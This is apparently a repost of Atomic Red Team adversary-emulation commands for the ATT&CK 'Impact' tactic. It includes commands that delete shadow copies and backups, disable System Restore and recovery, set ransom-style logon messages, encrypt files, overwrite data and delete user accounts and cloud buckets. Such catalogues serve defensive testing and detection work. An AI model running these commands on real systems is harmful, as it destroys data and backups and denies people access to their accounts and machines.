首页 > 其他分享 >Atomic-影响(impact)

Atomic-影响(impact)

时间:2023-09-15 16:36:09浏览次数:45  
标签:impact via Windows System Atomic file Test 影响 user

T1531

Account Access Removal

T1529

System Shutdown/Reboot

T1496

Resource Hijacking

T1491.001

Defacement: Internal Defacement

T1490

Inhibit System Recovery

T1489

Service Stop

T1486

Data Encrypted for Impact

T1485

Data Destruction


T1531

Account Access Removal

Change User Password - Windows

net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} #{new_password}

Delete User - Windows

net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} /delete

Remove Account From Domain Admin Group

$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord
if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){
  Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False
} else{
    write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red
}

Change User Password via passwd

passwd #{user_account} #enter admin password > enter new password > confirm new password

Delete User via dscl utility

dscl . -delete /Users/#{user_account} #enter admin password

Delete User via sysadminctl utility

sysadminctl -deleteUser #{user_account} #enter admin password

Azure AD - Delete user via Azure AD PowerShell

Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
Remove-AzureADUser -ObjectId $userprincipalname

Azure AD - Delete user via Azure CLI

az login
$userprincipalname = "#{userprincipalname}"
az ad user delete --id $userprincipalname

T1529

System Shutdown/Reboot

Shutdown System - Windows

shutdown /s /t #{timeout}

Restart System - Windows

shutdown /r /t #{timeout}

Restart System via shutdown - macOS/Linux

shutdown -r #{timeout}

Shutdown System via shutdown - macOS/Linux

shutdown -h #{timeout}

Restart System via reboot - macOS/Linux

reboot

Shutdown System via halt - Linux

halt -p

Reboot System via halt - Linux

halt --reboot

Shutdown System via poweroff - Linux

poweroff

Reboot System via poweroff - Linux

poweroff --reboot

Logoff System - Windows

shutdown /l

T1496

Resource Hijacking

macOS/Linux - Simulate CPU Load with Yes

yes > /dev/null

T1491.001

Defacement: Internal Defacement

Replace Desktop Wallpaper

$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @' 
using System.Runtime.InteropServices; 
namespace Win32{

    public class Wallpaper{ 
        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
         
         public static void SetWallpaper(string thePath){ 
            SystemParametersInfo(20,0,thePath,3); 
        }
    }
} 
'@
$wc = New-Object System.Net.WebClient  
try{  
    $wc.DownloadFile($url, $imgLocation)
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
catch [System.Net.WebException]{  
    Write-Host("Cannot download $url") 
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
finally{    
    $wc.Dispose()  
}

Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force

T1490

Inhibit System Recovery

Windows - Delete Volume Shadow Copies

vssadmin.exe delete shadows /all /quiet

Windows - Delete Volume Shadow Copies via WMI

wmic.exe shadowcopy delete

Windows - wbadmin Delete Windows Backup Catalog

wbadmin delete catalog -quiet

Windows - Disable Windows Recovery Console Repair

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no

Windows - Delete Volume Shadow Copies via WMI with PowerShell

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

Windows - Delete Backup Files

del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk

Windows - wbadmin Delete systemstatebackup

wbadmin delete systemstatebackup -keepVersions:0

Windows - Disable the SR scheduled task

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

Disable System Restore Through Registry

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f

T1489

Service Stop

Windows - Stop service using Service Controller

sc.exe stop #{service_name}

Windows - Stop service using net.exe

net.exe stop #{service_name}

Windows - Stop service by killing process

taskkill.exe /f /im #{process_name}

T1486

Data Encrypted for Impact

Encrypt files using gpg (Linux)

echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}

Encrypt files using 7z (Linux)

$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}

Encrypt files using ccrypt (Linux)

if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi

Encrypt files using openssl (Linux)

$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}

PureLocker Ransom Note

echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt

Encrypt files using 7z utility - macOS

7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}

Encrypt files using openssl utility - macOS

openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}

Data Encrypted with GPG4Win

cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'

T1485

Data Destruction

Windows - Overwrite file with Sysinternals SDelete

if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"

macOS/Linux - Overwrite file with DD

dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes

Overwrite deleted data on C drive

cipher.exe /w:C:

GCP - Delete Bucket

gcloud config set project #{project_id}
gcloud storage buckets delete gs://#{bucket_name}

迷茫的人生,需要不断努力,才能看清远方模糊的志向!



标签:impact,via,Windows,System,Atomic,file,Test,影响,user
From: https://blog.51cto.com/u_5139878/7483309

相关文章

  • Atomic-渗漏(Exfiltration)
    T1567.002ExfiltrationOverWebService:ExfiltrationtoCloudStorageT1048ExfiltrationOverAlternativeProtocolT1048.003ExfiltrationOverAlternativeProtocol:ExfiltrationOverUnencrypted/ObfuscatedNon-C2ProtocolT1048.002ExfiltrationOverAlternative......
  • pandas中的dataframe使用loc取数据之后进行操作后对原来的dataframe产生影响的bug
    相关问题:Pythonpandas.DataFrame在用ix,loc,iloc索引的时候就相当于拷贝copy了一个对象_reachHigher的博客-CSDN博客 针对这样子的dataframe:如果进行单列选取后得到的是series类型的数据:那么对part_1进行修改后会对原来的df产生修改:如果进行单列选取的时候就上[],那......
  • 数据库使用uuid的影响
    关于数据库主键性能差异比较对象:(自增主键、有序uuid、无序uuid)前置条件:根据自增主键、有序uuid、无序uuid相同环境相同条件新增3张测试表,分别向每张表插入5020000数据1、插入性能:插入耗时对比:自增:91257ms有序uuid:98779ms无序uuid:275468ms2、对比页的分裂数自增page_......
  • 铺先生:影响店铺转让的因素都有那些?合理分析才能更快转店
    很多家里面开有店的朋友可能都有遇到多的很多的问题,或是因为生活上或是因为经营上。这些问题都难免会让人们心中产生转让的想法,但是他们这时候又遇到了难题了,他们不知道影响店铺转让的因素都有哪些,从而导致了想把店铺转让了,但是又无从下手的情况。其实我们只需要了解一些点,就能够解......
  • 【快节奏的生活带来了什么影响】
    快节奏时代的我们原因随着互联网时代的发展,信息的洪流奔涌而来,越来越方便的信息获取途径,越来越迅速的信息更新,甚至还没来得及消化就已经被淘汰的信息,此类种种,让我们被信息炮弹所击晕,晕头转向的同时也被各类碎片化的信息满足感所充斥。影响一、曾经的我们能够静下心来去欣赏风......
  • MGR新节点RECOVERING状态的分析与解决:caching_sha2_password验证插件的影响
    MGR新节点RECOVERING状态的分析与解决:caching_sha2_password验证插件的影响起因在GreatSQL社区上有一位用户提出了“手工构建MGR碰到的次节点一直处于recovering状态”,经过排查后,发现了是因为新密码验证插件caching_sha2_password导致的从节点一直无法连接主节点,帖子地址:(https:/......
  • 初露头角!Walrus入选服贸会“数智影响力”数字化转型创新案例
    9月5日,由北京市通信管理局、工业和信息化部新闻宣传中心联合主办的“企业数字化转型论坛”在2023中国国际服务贸易交易会期间召开,论坛以“数字化引领高质量发展”主题,旨在探讨信息技术如何与各行业深度融合,构建数字化转型新格局,赋能产业高质量发展。  本次论坛上发布了2023......
  • 铺先生:影响店铺转让的因素,知道这些对转店有利
    一个店铺经营时间长了,难免会遇到很多的问题,可能是经营上的问题,可能是家庭问题,这时候很多人都会因为这些问题而选择转让。但是作为第一次转店,自己并没有什么经验,这也就导致了很长时间都没能成功把店铺转让出去。这时候就会有很多人都想知道影响店铺转让的因素都有什么?下面小编就简单......
  • 强化学习中子进程调用atari游戏是否受父进程中设置的随机种子影响
    相关:python中numpy.random.seed设置随机种子是否影响子进程  ============================================ 代码:fromale_python_interfaceimportALEInterfaceimportnumpyasnpnp.random.seed(1111)importcv2importtimefilename="atari_roms"+"/&quo......